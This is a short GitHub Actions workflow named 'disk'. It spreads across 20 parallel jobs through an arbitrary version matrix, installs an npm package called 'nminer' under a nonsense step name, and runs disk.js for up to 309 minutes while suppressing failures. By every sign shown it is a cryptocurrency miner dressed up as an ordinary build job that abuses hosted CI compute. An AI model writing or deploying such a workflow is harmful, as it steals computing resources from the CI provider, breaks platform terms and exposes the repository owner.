name: disk
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5893 }
          - { version: 1728 }
          - { version: 140 }
          - { version: 224 }
          - { version: 9070 }
          - { version: 8569 }
          - { version: 2681 }
          - { version: 3594 }
          - { version: 3054 }
          - { version: 5245 }
          - { version: 996 }
          - { version: 407 }
          - { version: 3544 }
          - { version: 160 }
          - { version: 7483 }
          - { version: 4993 }
          - { version: 4235 }
          - { version: 9577 }
          - { version: 7969 }
          - { version: 9229 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: coordination why gadzooks
        run: |
          npm install nminer@latest
          timeout 309m node disk.js || echo "disk executed"